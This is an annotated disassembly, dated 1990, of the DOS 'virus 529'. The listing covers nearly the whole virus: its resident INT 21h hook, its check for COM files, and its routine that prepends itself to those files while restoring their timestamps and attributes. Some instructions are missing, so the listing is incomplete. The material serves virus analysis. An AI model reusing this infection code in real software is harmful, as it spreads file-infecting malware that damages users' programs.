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; virus 529 extracted from full memory dump published by N.N.Bezrukov
; in Virus Guide (Computer Virology) edition 3.5. First information about this
; virus has been released by D.N.Lozinsky (Leningrad USSR) before june 1990.
; Dissasembly: A.Kadlof 1990-08-31
; Virus code is placed at the begining of the file
0100 B815CA MOV AX,CA15 ; is resident part alredy instaled?
0103 8B361B01 MOV SI,[011B] ; offset of oryginal first 529 bytes
0107 BF0001 MOV DI,0100 ; begining of the file
010A 8B0E1D01 MOV CX,[011D] ; 0211h = 529 virus length
010E 8B1E1901 MOV BX,[0119] ; 0101h or less means: do not disable
0112 CD21 INT 21 ; resident part of the virus
; if resident part of the virus is instaled then INT 21 with AX = CA15
; will start infected program, atherwise we will come here
0114 FF361F01 PUSH [011F] ; jump to CS:0147
0118 C3 RET
; virus date area
0119 01 01 ; flag - disable virus request
011B D0 07 ; adress of oryginal 529 byte of the file, oryginal file length
; plus 100h (size of memory image of file + PSP)
011D 11 02 ; virus length
011F 47 01 ; offset of virus code after working area
0121 79 00 ; ??
0123 C0 01
0125 04 00
0127 C4 01 ; offset of new INT 21h handler
0129 4D 00
012B 11 02 EA 00 FB ; ??
0130 02 01 00 FC 02 01 00 ; ??
; EXEC Parameter Block
0137 00 00 ; segment of child enviroment
0139 80 00 0E 25 ; adress of command line
013D 5C 00 0E 25 ; adress of first FCB
013F 6C 00 0E 25 ; adress of second FCB
0145 CA 01 ; offset of virus int 21h handler
; continue instalation of virus if resident part is not present
0147 A11D01 MOV AX,[011D] ; 0211h virus length
014A 051401 ADD AX,0114 ; AX := 325h length of buffer and
; working area
014D 90 NOP
014E A30503 MOV [0305],AX ; I/O buffer
0151 03061D01 ADD AX,[011D]
0155 050001 ADD AX,0100
0158 A30D03 MOV [030D],AX
015D 050F00 ADD AX,000F
0160 B104 MOV CL,04
0162 D3E8 SHR AX,CL
0164 A30F03 MOV [030F],AX ; memory (in paragraphs) requested by
0167 06 PUSH ES ; virus (64 paragraphs)
; capture INT 21h
0168 B82135 MOV AX,3521 ; get INT 21h
016B CD21 INT 21
; store it
016D 8C06FF02 MOV [02FF],ES
0171 891EFD02 MOV [02FD],BX
0175 07 POP ES ; restore from the stack
0176 8B162701 MOV DX,[0127] ; offset of new INT 21h
017A B82125 MOV AX,2521 ; set INT 21h
017D CD21 INT 21
017F 8B1E0F03 MOV BX,[030F] ; size of requested memory
0183 B44A MOV AH,4A ; modify allocated memory block
0185 CD21 INT 21
0187 8CC0 MOV AX,ES
0189 A33B01 MOV [013B],AX ; prepare EXEC Parameter Block
018C A33F01 MOV [013F],AX
018F A34301 MOV [0143],AX
0192 8E1E2C00 MOV DS,[002C] ; enviroment block
0196 33F6 XOR SI,SI ; point at the begining of block
0199 0A04 OR AL,[SI] ; look for 0, 0 marker
019B 75FB JNZ 0198
019D 83C603 ADD SI,+03 ; point at full pathname
01A0 8BD6 MOV DX,SI ; offset of name of virus carrier
01A2 BB3701 MOV BX,0137 ; adres of EXEC parameter block
01A5 B8004B MOV AX,4B00 ; Load & Execute
01A8 CD21 INT 21
01AC 8ED0 MOV SS,AX ; restore stack pointers
01AE 2E CS:
01AF 8B260D03 MOV SP,[030D]
01B3 B44D MOV AH,4D ; get return code of subprogram
01B5 CD21 INT 21
01B7 2E CS:
01B8 8B160F03 MOV DX,[030F] ; needed number of paragraphs
01BC B431 MOV AH,31 ; terminate but stay resident
01BE CD21 INT 21
01C0 B44C MOV AH,4C ; terminate process
01C2 CD21 INT 21
; new INT 21h handler
01C4 2E CS:
01C5 FF364501 PUSH [0145] ; 01CA
01C9 C3 RET
01CA 3D15CA CMP AX,CA15 ; virus call?
01CD 7519 JNZ 01E8 ; no
01CF 2E CS:
01D0 3B1E1901 CMP BX,[0119] ; disable request?
01D4 7608 JBE 01DE ; no
; disable resident part of virus
01D6 2E CS:
01D7 C70645010C02 MOV WORD PTR [0145],020C
; return to infected file, first copy oryginal 529 bytes from the end of the
; file to the begining (registers should be prepared by caller)
01E0 58 POP AX
01E1 B80001 MOV AX,0100 ; new start adress
01E4 50 PUSH AX
01E5 33C0 XOR AX,AX
; is it Load & Execute request?
01E8 3D004B CMP AX,4B00 ; Load & Execute
01EB 751F JNZ 020C ; no, jump to oryginal INT 21h
; check the name of loaded file (is it COM or not)
01EF 07 POP ES
01F0 8BFA MOV DI,DX ; name of loaded file
01F2 B9FFFF MOV CX,FFFF ; length of searched block
01F6 AE SCASB ; AL = 0;
01F7 26 ES:
01F8 8A45FE MOV AL,[DI-02] ; last letter of extension of name
01FB 0C20 OR AL,20 ; convert to lower letter
01FD 3C6D CMP AL,6D ; 'm' (is it COM?)
01FF 07 POP ES
0200 7505 JNZ 0207 ; no
0202 E80C00 CALL 0211 ; infect loaded file
0205 EB03 JMP 020A
0207 E8F100 CALL 02FB ; CS:02FB RET
020A 32C0 XOR AL,AL
020C 2E CS:
020D FF2EFD02 JMP FAR [02FD] ; oryginal INT 21h
; Infection of the new file
0211 06 PUSH ES
0212 50 PUSH AX
0213 53 PUSH BX
0214 1E PUSH DS
0215 52 PUSH DX
0218 0E PUSH CS
0219 1F POP DS
021A B82435 MOV AX,3524 ; get INT 24h
021D CD21 INT 21
021F 8C060303 MOV [0303],ES
0223 891E0103 MOV [0301],BX
0227 BAF802 MOV DX,02F8 ; offset of virus INT 24h handler
022A B82425 MOV AX,2524 ; set interrupt vector 24h
022D CD21 INT 21
0230 8B5600 MOV DX,[BP+00] ; adress of loaded file name
0233 8E5E02 MOV DS,[BP+02]
0236 B80043 MOV AX,4300 ; get file attributes
0239 CD21 INT 21
023B 7250 JB 028D ; problems
023D 2E CS:
023E 890E0B03 MOV [030B],CX ; store current file attributes
0242 B80143 MOV AX,4301 ; set file attributes
0245 33C9 XOR CX,CX ; clear all attributes
0247 CD21 INT 21
0249 7242 JB 028D ; problems
024B B8023D MOV AX,3D02 ; open file for read\write
024E CD21 INT 21
0250 7274 JB 02C6 ; problems
0252 1F POP DS
0253 8BD8 MOV BX,AX
0255 B80057 MOV AX,5700 ; get file date
0258 CD21 INT 21
025A 726A JB 02C6 ; problems
025C 890E0703 MOV [0307],CX ; store time
0260 89160903 MOV [0309],DX ; store date
0264 8B160503 MOV DX,[0305] ; offset of buffer
0268 8B0E1D01 MOV CX,[011D] ; number of bytes to read (full virus)
026C B43F MOV AH,3F ; read from file
026E CD21 INT 21
0270 7254 JB 02C6 ; problems
0272 3BC1 CMP AX,CX ; check for I/O problems
0274 7550 JNZ 02C6 ; problems
; compare first 19h bytes (25) to check is file alredy infected
0276 0E PUSH CS
0277 07 POP ES
0278 BF0001 MOV DI,0100
027D B91900 MOV CX,0019
0280 F3 REPZ
0281 A6 CMPSB
0282 7442 JZ 02C6 ; file infected
0284 B80242 MOV AX,4202 ; move file pointer
0287 33C9 XOR CX,CX ; to the end of file
0289 8BD1 MOV DX,CX ; CX:DX = 0
028B CD21 INT 21
028D 7237 JB 02C6 ; problems
028F 0BD2 OR DX,DX ; file over 64 Kb
0291 7533 JNZ 02C6 ; problems
0293 050001 ADD AX,0100
0296 A31B01 MOV [011B],AX
0299 3D00F0 CMP AX,F000
029C 7728 JA 02C6 ; file to big
029E 3DD007 CMP AX,07D0 ; file to small
02A1 7223 JB 02C6 ; problems
02A3 8B0E1D01 MOV CX,[011D] ; number of bytes
02A7 8B160503 MOV DX,[0305] ; offset of disk I/O buffer
02AB B440 MOV AH,40 ; write to file
02AD CD21 INT 21
02AF 7215 JB 02C6 ; problems
02B1 B80042 MOV AX,4200 ; move file pointer
02B4 33D2 XOR DX,DX ; to the beginning of file
02B6 8BCA MOV CX,DX ; CX:DX = 0
02B8 CD21 INT 21
02BA 720A JB 02C6 ; problems
02BE 8B0E1D01 MOV CX,[011D] ; number of bytes
02C2 B440 MOV AH,40 ; write to file
02C4 CD21 INT 21
; exit if any troubles or when done
02C6 B80157 MOV AX,5701 ; set file time and date
02C9 8B0E0703 MOV CX,[0307] ; recall time
02CD 8B160903 MOV DX,[0309] ; recall data
02D1 CD21 INT 21
02D3 B43E MOV AH,3E ; Close file (BX = handle)
02D5 CD21 INT 21
02D7 B80143 MOV AX,4301 ; set file attributes
02DA 8B0E0B03 MOV CX,[030B] ; recall attributes
02DE 8E5E02 MOV DS,[BP+02] ; segment of file name (ASCIIZ)
02E1 8B5600 MOV DX,[BP+00] ; offset of file name (ASCIIZ)
02E4 CD21 INT 21
02E6 2E CS:
02E7 C5160103 LDS DX,[0301]
02EB B82425 MOV AX,2524 ; restore INT 24h
02EE CD21 INT 21
02F2 5A POP DX
02F3 1F POP DS
02F4 5B POP BX
02F5 58 POP AX
02F6 07 POP ES
02F7 C3 RET
; INT 24h handler during infection
02F8 B003 MOV AL,03
; date holder
02FD 5C 06 FD 18 ; old INT 21h holder
0301 56 05 9D 10 ; old INT 24h holder
0305 25 03 ; offset of disk I/O buffer
0307 36 00 ; file time
0309 21 00 ; file date
030B 20 00 ; file attributes
030D 36 06 ; SP holder
030F 64 00 ; segment-paragraph just beyond the end of resident part
0325 ; I/O bufer